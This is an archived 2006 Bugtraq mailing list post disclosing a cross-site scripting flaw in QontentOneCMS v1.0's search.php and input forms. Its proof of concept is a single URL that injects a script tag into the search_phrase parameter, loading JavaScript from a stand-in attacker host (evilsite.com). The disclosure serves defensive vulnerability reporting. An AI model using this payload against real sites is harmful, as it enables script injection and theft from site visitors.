Bugtraq mailing list archives

QontentOneCMS v1.0


From: luny () youfucktard com
Date: 31 May 2006 03:32:30 -0000

QontentOneCMS v1.0

homepage:
http://www.qontentone.com/

Effected files:
search.php
input forms

XSS Proof of concept:

http://www.example.com/search.php?search_phrase=";><SCRIPT SRC=http://www.evilsite.com/xss.js></SCRIPT><"&search=Search


Current thread: